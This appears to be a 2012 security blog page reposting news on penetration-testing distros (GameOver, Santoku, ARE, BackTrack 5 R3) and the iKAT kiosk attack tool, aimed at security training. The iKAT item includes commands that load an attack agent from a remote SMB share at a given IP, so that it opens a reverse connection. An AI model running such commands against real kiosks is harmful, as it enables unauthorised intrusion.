border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Pages

Tuesday, August 28, 2012

Distribution to train GameOver web security



GameOver is a project that aims to train and educate newbies in web basic safety and help you understand the main existing web attacks. It is a distribution Voyage Linux (based on Debian) that application has two sections: 

Section 1. Collection of web applications designed specifically to teach the basics of web security, covering XSS, CSRF, RFI and LFI, brute force authentication , path traversal, command execution and SQL injection:

1. Damn Vulneable Web Application
2. OWASP WebGoat

3. Ghost 
4. Mutillidae Zap-Wave

Section 2. Collection of deliberately insecure applications to practice and test our skills before conducting a penetration test in a real environment: 

1. Owasp Hacademic Challenges
2. Vicnum Owasp 
3. WackoPicko
4. Owasp Insecure Web App
5. BodgeIT
6. PuzzleMall
7. WAVSEP
To test you can download the virtual machine (VM need Player 4.0.2 or higher and at least 256 MB of RAM) or for a LiveCD ISO: 

username : root 
password : gameover

Ikat VI: new version of the popular tool to attack Internet kiosks



Paul Craig officially launched on August 15 and during the conference XCon2012 Beijing revision 2012 or version VI of Ikat (The Interactive Kiosk Attack Tool) , the de-facto standard for penetration testing in restricted environments such as Citrix terminals, and webTVs Kiosks of Internet access services, photo printing, directories airports, museums, etc ... Ikat is very easy to use (we could call it clumsily "graphic hacking"), is 100% free and is presented as a SaaS website (software as a service) that you can visit from any browser in order to exploit the shift kiosk and get a system console. The url is http://adf.ly/CKa3z and now we can find versions for Windows, Linux and other called PhotoKAT designed to exploit any system that allows us to insert a USB device or memory card (usually photo printing terminals ).

One of the biggest changes is the implementation of a client-server model which includes an agent in each payload to establish a reverse connection to the server ikat which will handle all post-exploitation tasks. This will try to evade antivirus locks and kiosk manufacturers, as you can imagine, including his tools were already at the top of their blacklists. further highlight is the publication of an SMB read resource sharing containing the agent, his bookstore and various tools. This way we can run the agent simply throwing \ \ 120.138.22.77 \ ikat \ ikat.exe from the command line or by recording your library with regsvr32 \ \ 120.138.22.77 \ ikat \ ikat.dll , very useful when we execute commands but can not download files. Moreover, integration with Metasploit Browser AutoPWN, new techniques, more exploits, tools, browser plug-ins, PDF files / Office and endless "tricks" to commit more such environments. So beware if you print your photos or connect to the Internet at an Internet cafe or at a kiosk in a hotel because, what you see now with different eyes? lol

ARE: VM for Android malware analysis



ARE (Android Reverse Engineering) is a virtual machine with an int eresante set of tools to analyze different artifacts of Android malware in a secure environment. The image developed by a French group of the Honeynet Project runs in VirtualBox and comprises 10 tools, including Androguard and the Android SDK:

Androguard
Android SDK / NDK
APKInspector
Apktool
Axmlprinter
Ded
Dex2jar
Droidbox
Jad
Smali / Baksmali
Project website: http://redmine.honeynet.org/projects/are/wiki

Santoku Linux Mobile Forensic & Security Distribution



Santoku is a platform for mobile forensics, mobile malware analysis and mobile application security assessment. The free Santoku Community Edition is a collaborative project to provide a pre-configured Linux environment with utilities, drivers and guides for these areas. The alpha release is based on a fork of the OWASPMobiSec distro.

The word santoku loosely translates as ‘three virtues’ or ‘three uses’. Santoku Linux has been crafted to support you in three endeavours:

Mobile Forensics
Tools to acquire and analyze data

Firmware flashing tools for multiple manufacturers
Imaging tools for NAND, media cards, and RAM
Free versions of some commercial forensics tools
Useful scripts and utilities specifically designed for mobile forensics 

Mobile Malware
Tools for examining mobile malware

Mobile device emulators
Utilities to simulate network services for dynamic analysis
Decompilation and disassembly tools
Access to malware databases 

Mobile Security
Assessment of mobile apps

Decompilation and disassembly tools
Scripts to detect common issues in mobile applications
Scripts to automate decrypting binaries, deploying apps, enumerating app details, and more 

Development Tools:
Android SDK Manager
BlackBerry JDE
BlackBerry Tablet OS SDK
BlackBerry WebWorks
DroidBox
Eclipse IDE
Windows Phone SDK
Android 2.3.3, 3.2, and 4.0.3 Emulators
SecurityCompass Lab Server (HTTP and HTTPS)
BlackBerry Ripple
BlackBerry Simulators
Penetration Testing:
CeWL
DirBuster
Fierce
Nikto
nmap
Burp Suite
Mallory
w3af Console
w3af GUI
ZAP
BeEF
Ettercap
iSniff
Metasploit Console
Metasploit GUI
NetSed
SET
SQLMap
SSLStrip
Reverse Engineering:
APK Tool
Dex2Jar
Flawfinder
Java Decompiler
Strace
Wireless Analyzers:
Aircrack-ng
Kismet
Ubertooth Kismet
Ubertooth Spectrum Analyzer
Wireshark
Device Forensics:
AFLogical Open Source Edition
Android Encryption Brute Force
BitPim
BlackBerry Desktop Manager
Foremost
iPhone Backup Analyzer
MIAT
Paraben Device Seizure
Sift Workstation
Sleuth Kit
SQLiteSpy
Mobile Infrastructure:
BES Express
Google Mobile Management
iPhone Configuration Tool

DOWNLOAD Santoku Community Edition 

Tuesday, August 21, 2012

How To Upgrade From BackTrack 5 R2 to BackTrack 5 R3



Recently, released the long-awaited BackTrack 5 R3 but for those of you who don’t want to start fresh with a new installation, have no fear because you can easily upgrade your existing installation of R2 to R3.

Our primary focus with this release was on the implementation of various bug fixes, numerous tools upgrades and well over 60 new additions to the BackTrack suite. Because of this, the upgrade path to BackTrack 5 R3 is relatively quick and painless.

First, you will want to make sure that your existing system is fully updated:

apt-get update & apt-get dist-upgrade
With the dist-upgrade finished, all that remains is the install the new tools that have been added for R3. An important point to keep in mind is that there are slight differences between the 32-bit and 64-bit tools so make sure you choose the right one.

32-Bit Tools

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

64-Bit Tools:


apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

That’s all there is to it! Once the new tools have been installed, you are up and running with BackTrack 5 R3. As always, if you come across any bugs or issues, please submit tickets via our BackTrack Redmine Tracker.

Monday, August 13, 2012

BackTrack 5 R3 released


The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.

Building, testing and releasing a new BackTrack revision is never an easy task. Keeping up-to-date with all the latest tools, while balancing their requirements of dependencies, is akin to a magic show juggling act. Thankfully, active members of our redmine community such as backtrack lover and JudasIscariot make our task that much easier by actively reporting bugs and suggesting new tools on a regular basis. Hats off to the both of you.

We would like to thank Offensive Security for providing the BackTrack dev team with the funding and resources to make all of this happen. Also, a very special thanks to Dookie, our lead developer – for building, testing and packaging most of the new tools in this release.

Together with our usual KDE and GNOME, 32/64 bit ISOs, we have released a single VMware Image (Gnome, 32 bit). For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.

Lastly, if you’re looking for intensive, real world, hands on Penetration Testing Training – make sure to drop by Offensive Security Training, and learn the meaning of “TRY HARDER“.

For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. 

BT5R3-GNOME-64.torrent  (md5: 8cd98b693ce542b671edecaed48ab06d)
BT5R3-GNOME-32.torrent (md5: aafff8ff5b71fdb6fccdded49a6541a0)
BT5R3-KDE-64.torrent (md5: 981b897b7fdf34fb1431ba84fe93249f)
BT5R3-KDE-32.torrent (md5: d324687fb891e695089745d461268576)
BT5R3-GNOME-32-VM.torrent (md5: bca6d3862c661b615a374d7ef61252c5)

Follow Us

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More